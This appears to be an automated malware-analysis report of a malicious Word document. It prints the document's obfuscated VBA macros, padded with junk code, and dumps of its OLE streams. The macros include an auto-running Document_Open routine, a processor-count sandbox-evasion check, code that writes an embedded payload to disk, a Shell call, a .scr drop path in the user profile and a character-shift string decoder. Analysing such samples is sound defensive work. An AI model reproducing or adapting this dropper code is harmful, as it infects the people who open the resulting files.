                    B4lhk = CFq3n
                    
                    .Type = 1
                    
                    Dim D63dd As Long
                    
                    D63dd = (973 + 343) + 33
                    
                    Dim FDF4N As Byte
                    
                    FDF4N = 16
                    
                    Dim Y1Nl5(27 To 423) As String
                    
                    Y1Nl5(27) = UDtTh
                    
                    Dim Cs0R0(19 To 124) As String
                    
                    Cs0R0(19) = "HfFAf"
                    
                    Dim X1p7U As Long
                    
                    X1p7U = (950 / 873) / 47
                    
                    Dim R2c6v As String
                    
                    R2c6v = D6zNx
                    
                    Dim B34TO As Long
                    
                    B34TO = (-161 / 416) + 5
                    
                    Dim TTFj2 As String
                    
                    TTFj2 = NGKGP
                    
                    Dim Nu4T2(0 To 1) As Long
                    
                    Nu4T2(0) = (825 / 270) - 15
                    
                    .Open
                    
                    Dim DsPYr(58) As Byte
                    
                    DsPYr(58) = 144
                    
                    Dim Y4seF As String
                    
                    Y4seF = "MiHQ1"
                    
                    Dim LC6S4(10) As Byte
                    
                    LC6S4(10) = 140
                    
                    Dim T1aQ4 As Long
                    
                    T1aQ4 = (-451 - 427) + 12
                    
                    Dim IOEQ4 As Byte
                    
                    Dim OuZ8q As String
                    
                    OuZ8q = Y2Jti
                    
                    Dim X281p(17 To 232) As Long
                    
                    X281p(17) = (362 - 693) - 42
                    
                    Dim R0y38 As Long
                    
                    R0y38 = (-428 / 908) + 11
                    
                    Dim JlHnA(9 To 346) As Long
                    
                    JlHnA(9) = (408 - 939) - 28
                    
                    Dim D73Ej As Byte
                    
                    Dim DVx10(6 To 28) As Long
                    
                    DVx10(6) = (287 / 732) / 9
                    
                    Dim Sd4C8 As Byte
                    
                    Dim T2nwq As Byte
                    
                    Dim FACoO(4 To 335) As Long
                    
                    FACoO(4) = (-383 + 419) / 20
                    
                    Dim Lf858 As String
                    
                    Lf858 = GLr0d
                    
                    Dim OTSOx(4 To 464) As String
                    
                    OTSOx(4) = "In832"
                    
                    Dim GOewz(51) As Byte
                    
                    GOewz(51) = 54
                    
                    Dim PmB80(24) As Byte
                    
                    PmB80(24) = 7
                    
                    Dim Nm7yu As String
                    
                    Nm7yu = "RUtlW"
                    
                    Dim JP35x As String
                    
                    JP35x = MvykX
                    
                    Dim M78t5(39) As Byte
                    
                    M78t5(39) = 64
                    
                    Dim Jqn4z(82) As Byte
                    
                    Jqn4z(82) = 229
                    
                    Dim HT1BL As Long
                    
                    HT1BL = (956 / 463) + 39
                    
                    Dim Sh6B5 As Long
                    
                    Sh6B5 = (963 + 998) - 44
                    
                    Dim ZVW1Y(65) As Byte
                    
                    ZVW1Y(65) = 243
                    
                    .Write SG07j
                    
                    Dim UA6uq As String
                    
                    UA6uq = "SxTq1"
                    
                    Dim RXnfC(22 To 447) As Long
                    
                    RXnfC(22) = (108 / 292) + 19
                    
                    Dim HM2qo As Byte
                    
                    Dim DR87R As String
                    
                    DR87R = JS08j
                    
                    Dim JiK8G(91) As Byte
                    
                    JiK8G(91) = 209
                    
                    Dim Bd8PI(31) As Byte
                    
                    Bd8PI(31) = 5
                    
                    Dim KS30R(99) As Byte
                    
                    KS30R(99) = 70
                    
                    Dim J5Olx As String
                    
                    J5Olx = N6b2y
                    
                    Dim R4238(25 To 187) As Long
                    
                    R4238(25) = (-908 - 590) + 11
                    
                    Dim Wa1rO As Byte
                    
                    Wa1rO = 202
                    
                    Dim JOHVE As Byte
                    
                    JOHVE = 41
                    
                    Dim ICvSv As String
                    
                    ICvSv = Ace62
                    
                    Dim H0EKF(14 To 21) As String
                    
                    H0EKF(14) = "KQaR1"
                    
                    Dim EQbHq(27 To 288) As String
                    
                    EQbHq(27) = "S1B2c"
                    
                    Dim T5AC3(4 To 269) As String
                    
                    T5AC3(4) = "EQoob"
                    
                    Dim Hdkk7(25 To 393) As Long
                    
                    Hdkk7(25) = (-873 / 710) + 16
                    
                    Dim JPIU3(62) As Byte
                    
                    JPIU3(62) = 29
                    
                    Dim LKlOJ As String
                    
                    LKlOJ = "HIdCG"
                    
                    Dim Lxa6P(23 To 97) As String
                    
                    Lxa6P(23) = "N7HO2"
                    
                    Dim N7ds4 As Long
                    
                    N7ds4 = (14 + 884) + 23
                    
                    Dim J70a6(10 To 442) As String
                    
                    J70a6(10) = "Jg4kN"
                    
                    Dim VWgRj As String
                    
                    VWgRj = "Um027"
                    
                    Dim V0VyL As Byte
                    
                    Dim O6DJP As Byte
                    
                    Dim P0B8n As Byte
                    
                    Dim NZm7o As String
                    
                    NZm7o = A7h7X
                    
                    Dim Wx1mB(28 To 46) As String
                    
                    Wx1mB(28) = "IAqLs"
                    
                    Nr0bV = 140
                    
                    Dim W6cBD As Byte
                    
                    Dim IE28H As Byte
                    
                    Dim Ke3TM(44) As Byte
                    
                    Ke3TM(44) = 34
                    
                    Dim IIbp2 As Byte
                    
                    Dim NS8bc(0) As Byte
                    
                    NS8bc(0) = 29
                    
                    Dim KjY57(16 To 90) As String
                    
                    KjY57(16) = US5tA
                    
                    Dim E2fXs(8 To 68) As Long
                    
                    E2fXs(8) = (54 / 242) - 45
                    
                    Dim Dbq3a(0 To 1) As String
                    
                    Dbq3a(0) = R0be7
                    
                    Dim Cdn4b(8 To 279) As Long
                    
                    Cdn4b(8) = (-1 / 232) - 21
                    
                    Dim YHk1I As Byte
                    
                    Dim D3AZC(8 To 375) As String
                    
                    D3AZC(8) = "JhH55"
                    
                    Dim EyMnI As Byte
                    
                    EyMnI = 117
                    
                    Dim Bmb52(77) As Byte
                    
                    Bmb52(77) = 101
                    
                    Dim X3bT0(25 To 125) As Long
                    
                    X3bT0(25) = (151 - 755) - 34
                    
                    Dim T5XW8 As Byte
                    
                    T5XW8 = 9
                    
                    Dim AjSXV As Byte
                    
                    ReDim RTkJ0(UBound(SG07j) + Nr0bV)
                    
                    FWyLu = 62792
                    
                    For Yc8Rn = 62792 To UBound(SG07j)
                    
                    Ytg1B = A7fA2
                    
                    GBdyo = Pt7t4
                    
                    M5omZ = O5Fw8
                    
                    G48Yg = 132
                    
                    L733s = K83vS
                    
                    X0O3e = Nzfy5
                    
                    RTkJ0(Yc8Rn - 62792) = SG07j(Yc8Rn)
                    
                    MG03r = XBsOm
                    
                    NoDON = LBzBN
                    
                    Next
                    
                    Dim ZOoi3 As String
                    
                    ZOoi3 = Bpcx3
                    
                    Dim Oq4O7(4 To 280) As Long
                    
                    Oq4O7(4) = (550 - 414) / 24
                    
                    Dim M5r4q As Long
                    
                    M5r4q = (-841 - 58) / 9
                    
                    Dim PqC3P As String
                    
                    PqC3P = "J052Y"
                    
                    Dim XHDa8 As Long
                    
                    XHDa8 = (-935 + 672) - 34
                    
                    Dim Btv4s(38) As Byte
                    
                    Btv4s(38) = 22
                    
                    Dim R2ek8(29 To 88) As String
                    
                    R2ek8(29) = B2864
                    
                    Dim OZmq5 As Long
                    
                    OZmq5 = (498 - 852) + 25
                    
                    Dim S8G87(59) As Byte
                    
                    S8G87(59) = 254
                    
                    Dim GwL48 As String
                    
                    GwL48 = "VAZ1L"
                    
                    Dim Ibh16 As Long
                    
                    Ibh16 = (617 + 665) - 40
                    
                    RTkJ0(G48Yg) = Nr0bV
                    
                    Dim S02ZX As Long
                    
                    S02ZX = (-788 / 872) - 39
                    
                    Dim S0omk As Byte
                    
                    Dim X6nj0(26) As Byte
                    
                    X6nj0(26) = 240
                    
                    Dim K7BVf As Byte
                    
                    K7BVf = 232
                    
                    Dim HqBS3 As Byte
                    
                    HqBS3 = 250
                    
                    Dim BnoOq(4 To 241) As Long
                    
                    BnoOq(4) = (675 - 7) + 35
                    
                    Dim T43CU As String
                    
                    T43CU = B3Q2l
                    
                    Dim M13Eo As Byte
                    
                    M13Eo = 159
                    
                    Dim L5af6 As String
                    
                    L5af6 = "OSb7k"
                    
                    Dim PXqeM(16) As Byte
                    
                    PXqeM(16) = 100
                    
                    Dim Ii745 As String
                    
                    Ii745 = A35Ls
                    
                    Dim ZmoPt As Byte
                    
                    Dim JpmGb(10 To 74) As String
                    
                    JpmGb(10) = "MJId0"
                    
                    Dim YkN4C(9 To 421) As Long
                    
                    YkN4C(9) = (800 - 56) + 7
                    
                    Dim K58bD(18 To 66) As Long
                    
                    K58bD(18) = (-554 + 920) + 17
                    
                    Dim Qktd2 As Long
                    
                    Qktd2 = (338 - 233) - 14
                    
                    Dim Gs8t8 As String
                    
                    Gs8t8 = N578T
                    
                    Open B78Bz For Binary As #19
                    
                    Dim Uqt4K(18 To 483) As Long
                    
                    Uqt4K(18) = (-535 + 962) + 35
                    
                    Dim HL8B8(40) As Byte
                    
                    HL8B8(40) = 163
                    
                    Dim FH3aW As String
                    
                    FH3aW = U3038
                    
                    Dim Pz62B(59) As Byte
                    
                    Pz62B(59) = 168
                    
                    Dim S303u(92) As Byte
                    
                    S303u(92) = 61
                    
                    Dim NW5wB As Long
                    
                    NW5wB = (279 / 633) + 28
                    
                    Dim Pp7vm(79) As Byte
                    
                    Pp7vm(79) = 12
                    
                    Dim D20d3 As Byte
                    
                    D20d3 = 212
                    
                    Dim SE0jN As String
                    
                    SE0jN = "FPLi6"
                    
                    Dim T86QH(2 To 75) As String
                    
                    T86QH(2) = Y0SFj
                    
                    Dim XSppB As Long
                    
                    XSppB = (667 / 48) + 4
                    
                    Put #19, , RTkJ0
                    
                    Dim Mf17B(31 To 159) As Long
                    
                    Mf17B(31) = (349 - 920) + 18
                    
                    Dim AyHq1(27 To 332) As Long
                    
                    AyHq1(27) = (-390 + 749) + 19
                    
                    Dim N6L1O As Long
                    
                    N6L1O = (-764 + 116) + 7
                    
                    Dim JAYs7 As Byte
                    
                    JAYs7 = 216
                    
                    Dim P1h2Y(25 To 237) As String
                    
                    P1h2Y(25) = EqDjd
                    
                    Dim X1z36(43) As Byte
                    
                    X1z36(43) = 200
                    
                    Dim A4n88 As Long
                    
                    A4n88 = (-354 / 296) + 42
                    
                    Dim UbRVW As Long
                    
                    UbRVW = (-535 / 642) / 32
                    
                    Dim TU6xB As Long
                    
                    TU6xB = (-708 - 917) + 16
                    
                    Dim K48Z4 As Byte
                    
                    Dim EdHSW(7 To 484) As String
                    
                    EdHSW(7) = "DX0mh"
                    
                    Dim TeAB3 As Long
                    
                    TeAB3 = (1 - 500) + 34
                    
                    Close #19
                    
                    Dim J1Wo3 As String
                    
                    J1Wo3 = "U0xEV"
                    
                    Dim VF16a As String
                    
                    VF16a = "S6WCJ"
                    
                    Dim WcTgf As Long
                    
                    WcTgf = (768 / 466) - 7
                    
                    Dim JmG7I As String
                    
                    JmG7I = "R21L5"
                    
                    Dim J0t0N As Long
                    
                    J0t0N = (-891 / 842) / 5
                    
                    Dim Mu8NH(86) As Byte
                    
                    Mu8NH(86) = 250
                    
                    Dim QA4Mr(7 To 148) As Long
                    
                    QA4Mr(7) = (503 + 327) + 6
                    
                    Dim C0PZL As Long
                    
                    C0PZL = (-388 + 134) + 30
                    
                    Dim HrrCc(91) As Byte
                    
                    HrrCc(91) = 57
                    
                    Dim Hk0V0 As Long
                    
                    Hk0V0 = (713 + 996) / 2
                    
                    Dim Rb1h8 As Byte
                    
                    Rb1h8 = 112
                    
                    Dim U617W(12 To 96) As String
                    
                    U617W(12) = J6Xnm
                    
                    Dim ZRCcY(30 To 393) As String
                    
                    ZRCcY(30) = Gn0p5
                    
                    Dim P6yT0(59) As Byte
                    
                    P6yT0(59) = 81
                    
                    Dim YQZp0(66) As Byte
                    
                    YQZp0(66) = 53
                    
                    Dim Sa4Q0(0) As Byte
                    
                    Sa4Q0(0) = 65
                    
                    Dim WYHVk(1 To 106) As String
                    
                    WYHVk(1) = "PGn02"
                    
                    Dim Igsio(10 To 56) As String
                    
                    Igsio(10) = "V20A1"
                    
                    End With
                    
                    Dim TY3vv As Long
                    
                    TY3vv = (-297 + 744) + 33
                    
                    Dim RtUn3 As String
                    
                    RtUn3 = X6RIx
                    
                    Dim HT1LE(48) As Byte
                    
                    HT1LE(48) = 60
                    
                    Dim Kg17y(11) As Byte
                    
                    Kg17y(11) = 227
                    
                    Dim T6AE8 As Long
                    
                    T6AE8 = (-907 - 367) - 32
                    
                    Dim D6KKC As Byte
                    
                    Dim TOe3b As String
                    
                    TOe3b = "CtDSH"
                    
                    Dim BIXuv As Byte
                    
                    BIXuv = 20
                    
                    Dim DHJ31(10) As Byte
                    
                    DHJ31(10) = 98
                    
                    Dim A7OP0 As String
                    
                    A7OP0 = TyTNz
                    
                    Dim D2WGt(28 To 97) As Long
                    
                    D2WGt(28) = (876 + 476) - 31
                    
                    Dim URDqO(11 To 381) As Long
                    
                    URDqO(11) = (103 - 251) - 31
                    
                    Dim ZQQNT As Long
                    
                    ZQQNT = (-941 + 373) + 30
                    
                    Dim U60S8 As Long
                    
                    U60S8 = (-290 + 803) + 20
                    
                    Dim IVOcx As Byte
                    
                    IVOcx = 200
                    
                    Dim RmOJE(9 To 201) As String
                    
                    RmOJE(9) = "Qgym7"
                    
                    Dim C1E75(10 To 44) As String
                    
                    C1E75(10) = "Gt7oe"
                    
                    Dim UQkcM(91) As Byte
                    
                    UQkcM(91) = 217
                    
                    Dim Q2z35 As Byte
                    
                    Q2z35 = 177
                    
                    End Sub
                    
                    Public Sub sh1(F00qU)
                    
                    Dim Ptc5o(13 To 200) As String
                    
                    Ptc5o(13) = H0M0p
                    
                    Dim ZaG8G(8 To 99) As Long
                    
                    ZaG8G(8) = (162 + 318) - 21
                    
                    Dim I5ig6(14 To 381) As String
                    
                    I5ig6(14) = "XGe3h"
                    
                    Dim Bpabn As String
                    
                    Bpabn = "M8V15"
                    
                    Dim DAF72 As String
                    
                    DAF72 = "LBfNF"
                    
                    Dim TKO2N As Long
                    
                    TKO2N = (-315 + 418) - 5
                    
                    Dim L587f As Long
                    
                    L587f = (-185 - 760) - 7
                    
                    Dim AAec6(34 To 341) As String
                    
                    AAec6(34) = Kh1g3
                    
                    Dim Nm0Yv As Long
                    
                    Nm0Yv = (415 - 106) + 43
                    
                    Dim G6l8T(19 To 438) As String
                    
                    G6l8T(19) = "B0v6X"
                    
                    Dim LTFyB As Long
                    
                    LTFyB = (-448 + 490) + 36
                    
                    Dim JQ6ao(16 To 331) As String
                    
                    JQ6ao(16) = W4t1q
                    
                    Dim T61ct(58) As Byte
                    
                    T61ct(58) = 198
                    
                    Dim ToH5N(9 To 217) As Long
                    
                    ToH5N(9) = (670 - 498) / 32
                    
                    Dim H65i1 As String
                    
                    H65i1 = "M3wGt"
                    
                    Dim Ulb3r(30 To 474) As Long
                    
                    Ulb3r(30) = (886 + 165) + 27
                    
                    Dim FTHZk(6 To 474) As String
                    
                    FTHZk(6) = K1jv6
                    
                    Dim X1MrK As Byte
                    
                    Dim OOI2e As Long
                    
                    OOI2e = (958 + 425) - 45
                    
                    Dim I10aL(28 To 158) As Long
                    
                    I10aL(28) = (256 / 317) + 4
                    
                    Dim Md7Q6(26 To 100) As String
                    
                    Md7Q6(26) = "Qpo3B"
                    
                    Dim DtE35(25 To 292) As String
                    
                    DtE35(25) = W10rU
                    
                    Dim BCl86(56) As Byte
                    
                    BCl86(56) = 171
                    
                    Dim S3G1Z As Byte
                    
                    S3G1Z = 88
                    
                    Dim Vp54V(31 To 165) As String
                    
                    Vp54V(31) = WK0I3
                    
                    Dim XVX82 As String
                    
                    XVX82 = "VL6YB"
                    
                    Shell F00qU
                    
                    Dim TaG5l(36) As Byte
                    
                    TaG5l(36) = 225
                    
                    Dim BB7L8(5 To 168) As Long
                    
                    BB7L8(5) = (-165 / 193) + 26
                    
                    Dim Lf1pz As Byte
                    
                    Lf1pz = 76
                    
                    Dim Z7x5a(28 To 292) As Long
                    
                    Z7x5a(28) = (-248 / 732) + 46
                    
                    Dim XgI18 As Long
                    
                    XgI18 = (778 - 317) + 27
                    
                    Dim F4HU2(84) As Byte
                    
                    F4HU2(84) = 113
                    
                    Dim PgKgC(5) As Byte
                    
                    PgKgC(5) = 166
                    
                    Dim APvq3(20) As Byte
                    
                    APvq3(20) = 139
                    
                    Dim T8sNm(2 To 86) As Long
                    
                    T8sNm(2) = (-843 + 294) + 10
                    
                    Dim H0KD2 As Long
                    
                    H0KD2 = (664 / 688) - 11
                    
                    Dim N2PIL As String
                    
                    N2PIL = Yi5qQ
                    
                    Dim Q37jQ As Byte
                    
                    Q37jQ = 252
                    
                    Dim Rrp7P As String
                    
                    Rrp7P = Td518
                    
                    Dim Y27e5(28 To 130) As Long
                    
                    Y27e5(28) = (823 / 937) - 47
                    
                    Dim QsI7W(66) As Byte
                    
                    QsI7W(66) = 100
                    
                    Dim Zy4bG(43) As Byte
                    
                    Zy4bG(43) = 218
                    
                    Dim Tg68A As Byte
                    
                    Tg68A = 121
                    
                    Dim I4ysJ As String
                    
                    I4ysJ = G4mfw
                    
                    Dim EKeB4(11 To 332) As Long
                    
                    EKeB4(11) = (44 - 194) + 49
                    
                    End Sub
                    
                    Sub Document_Open()
                    
                    Dim UlBiv As String
                    
                    UlBiv = T8F4v
                    
                    Dim MQ7hW(29 To 194) As String
                    
                    MQ7hW(29) = K5D8g
                    
                    Dim QPyeV As String
                    
                    QPyeV = Ul5qZ
                    
                    Dim F63XK As String
                    
                    F63XK = S28K3
                    
                    Dim Fy83h(26 To 265) As Long
                    
                    Fy83h(26) = (-385 - 366) - 24
                    
                    Dim C7kr8 As Long
                    
                    C7kr8 = (12 - 60) + 6
                    
                    On Error Resume Next
                    
                    If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" + KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 Then GoTo B0476
                    
                    Dim D6q0Q(25 To 133) As Long
                    
                    D6q0Q(25) = (-956 / 332) + 41
                    
                    Dim JJzIB As Long
                    
                    JJzIB = (-213 + 168) / 38
                    
                    Dim OMLpT As Long
                    
                    OMLpT = (574 / 575) / 44
                    
                    Dim KRfkL As String
                    
                    KRfkL = "Z265E"
                    
                    Dim W8NN6 As String
                    
                    W8NN6 = BJ05P
                    
                    Dim ZOC5l As Long
                    
                    ZOC5l = (-453 + 969) / 17
                    
                    Dim VIfVd(23 To 219) As String
                    
                    VIfVd(23) = P42zB
                    
                    Dim JinL2 As Byte
                    
                    Dim G2c48 As String
                    
                    G2c48 = "WE3yt"
                    
                    Dim VZLVx As Byte
                    
                    VZLVx = 165
                    
                    Dim M17C2(25 To 322) As String
                    
                    M17C2(25) = Q27gI
                    
                    Dim FPN8c As Long
                    
                    FPN8c = (236 / 794) - 26
                    
                    x CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr"
                    
                    Dim Xw24M As Byte
                    
                    Xw24M = 254
                    
                    Dim PqAkQ As Byte
                    
                    B0476:
                    
                    End Sub
VBA File Name: U2YLn.bas, Stream Size: 4651
General
Stream Path: VBA/U2YLn
VBA File Name: U2YLn.bas
Stream Size: 4651
                    Data ASCII:. . . . . . . . . l . . . . . . . . . . . . . . . s . . . . . . . . . . . . . . . . 8 R Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 01 00 00 f0 00 00 00 6c 07 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 73 07 00 00 ab 0e 00 00 00 00 00 00 01 00 00 00 e8 38 52 51 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword: OCkrm, Optional, randcif), Attribute, VNkBN, String, VB_Name, RuFGf, Function, HsaCb, YVBUd
                    VBA Code
                    Attribute VB_Name = "U2YLn"
                    
                    Function BjOEsxO3(Optional Wez36, Optional randcif)
                    
                    Dim YVBUd As Byte
                    
                    Dim K1txh(70) As Byte
                    
                    K1txh(70) = 153
                    
                    Dim K1oFf As String
                    
                    K1oFf = "GYv57"
                    
                    Dim P0K85 As Long
                    
                    P0K85 = (236 - 686) / 2
                    
                    Dim QDKu7(40) As Byte
                    
                    QDKu7(40) = 95
                    
                    Dim QHCci(15 To 388) As Long
                    
                    QHCci(15) = (993 / 320) / 33
                    
                    Dim XJLMD(97) As Byte
                    
                    XJLMD(97) = 14
                    
                    Dim LzTI8(33) As Byte
                    
                    LzTI8(33) = 56
                    
                    Dim W376U(2 To 177) As String
                    
                    W376U(2) = OCkrm
                    
                    Dim CkF05 As Long
                    
                    CkF05 = (-294 + 834) / 2
                    
                    Dim I365r(34) As Byte
                    
                    I365r(34) = 119
                    
                    Dim OFNUb(94) As Byte
                    
                    OFNUb(94) = 106
                    
                    Dim FyNWs(15 To 422) As String
                    
                    FyNWs(15) = AST0b
                    
                    Dim Ad61u As String
                    
                    Ad61u = "V7I6P"
                    
                    Dim M8yYX(6 To 242) As Long
                    
                    M8yYX(6) = (-686 - 221) / 49
                    
                    Dim VSA4C As Byte
                    
                    Dim NQ7c1 As Long
                    
                    NQ7c1 = (-813 / 193) + 36
                    
                    Dim UTudO(95) As Byte
                    
                    UTudO(95) = 224
                    
                    Dim YW2oS(33 To 216) As Long
                    
                    YW2oS(33) = (388 / 946) - 46
                    
                    Dim Y7a3h(22 To 308) As Long
                    
                    Y7a3h(22) = (-268 + 837) - 9
                    
                    Dim B8atH As String
                    
                    B8atH = ZYu1R
                    
                    Dim CKC1u(23 To 217) As Long
                    
                    CKC1u(23) = (215 + 644) - 47
                    
                    Dim VNkBN As String
                    
                    VNkBN = HsaCb
                    
                    For i = 1 To Len(Wez36)
                    
                    Dim ToR08 As String
                    
                    ToR08 = BbA1x
                    
                    K1AJP = K1AJP + Chr(Asc(Mid(Wez36, i, 1)) - 3)
                    
                    Dim RB48x(59) As Byte
                    
                    RB48x(59) = 202
                    
                    Dim RuFGf As Long
                    
                    RuFGf = (163 - 66) + 10
                    
                    Next
                    
                    Dim Qu53J As Byte
                    
                    Qu53J = 0
                    
                    Dim AX212 As String
                    
                    AX212 = OjKf2
                    
                    BjOEsxO3 = K1AJP
                    
                    Dim QFj46(93) As Byte
                    
                    QFj46(93) = 12
                    
                    Dim Y8FMQ As Byte
                    
                    Y8FMQ = 8
                    
                    End Function

                    Streams

Stream Path: LKfy2/\x1CompObj, File Type: data, Stream Size: 97
General
Stream Path: LKfy2/\x1CompObj
File Type: data
Stream Size: 97
Entropy: 3.61064918306
Base64 Encoded: False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: LKfy2/\x3VBFrame, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 261
General
Stream Path: LKfy2/\x3VBFrame
File Type: ASCII text, with CRLF, CR line terminators
Stream Size: 261
Entropy: 4.63124393053
Base64 Encoded: True
                    Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } L K f y 2 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 2 0 6 0 . . C l i e n t L e f t = 3 0 . . C l i e n t T o p = 3 1 0 . . C l i e n t W i d t h = 3 1 4 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n e r . .
                    Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 4c 4b 66 79 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 20 20 32 30
Stream Path: LKfy2/f, File Type: data, Stream Size: 38
General
Stream Path: LKfy2/f
File Type: data
Stream Size: 38
Entropy: 1.54052096453
Base64 Encoded: False
                    Data ASCII:. . . . . . . . . } . . . . . . 2 . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 a3 15 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: LKfy2/o, File Type: empty, Stream Size: 0
General
Stream Path: LKfy2/o
File Type: empty
Stream Size: 0
Entropy: 0.0
Base64 Encoded: False
Data ASCII: (empty)
Data Raw: (empty)
Stream Path: PROJECT, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 644
General
Stream Path: PROJECT
File Type: ASCII text, with CRLF, CR line terminators
Stream Size: 644
Entropy: 5.40333870486
Base64 Encoded: True
                    Data ASCII:I D = " { D 1 2 B C 7 0 C - 0 4 8 F - 4 B B D - B 8 C 7 - 0 F 2 B 9 5 C 6 7 E C F } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . M o d u l e = J 0 4 X t . . M o d u l e = J t u J u . . M o d u l e = U 2 Y L n . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = L K f y 2 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2
                    Data Raw:49 44 3d 22 7b 44 31 32 42 43 37 30 43 2d 30 34 38 46 2d 34 42 42 44 2d 42 38 43 37 2d 30 46 32 42 39 35 43 36 37 45 43 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4d 6f 64 75 6c 65 3d 4a 30 34 58 74 0d 0a 4d 6f 64 75 6c 65 3d 4a 74 75 4a 75 0d 0a 4d 6f 64 75 6c
Stream Path: PROJECTwm, File Type: data, Stream Size: 137
General
Stream Path: PROJECTwm
File Type: data
Stream Size: 137
Entropy: 3.5936854412
Base64 Encoded: False
                    Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . J 0 4 X t . J . 0 . 4 . X . t . . . J t u J u . J . t . u . J . u . . . U 2 Y L n . U . 2 . Y . L . n . . . L K f y 2 . L . K . f . y . 2 . . . . .
                    Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 4a 30 34 58 74 00 4a 00 30 00 34 00 58 00 74 00 00 00 4a 74 75 4a 75 00 4a 00 74 00 75 00 4a 00 75 00 00 00 55 32 59 4c 6e 00 55 00 32 00 59 00 4c 00 6e 00 00 00 4c 4b 66 79 32 00 4c 00 4b 00 66
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 22170
General
Stream Path: VBA/_VBA_PROJECT
File Type: data
Stream Size: 22170
Entropy: 5.33944479619
Base64 Encoded: True
                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                    Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 08 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
Stream Path: VBA/dir, File Type: data, Stream Size: 1195
General
Stream Path: VBA/dir
File Type: data
Stream Size: 1195
Entropy: 6.66385277748
Base64 Encoded: True
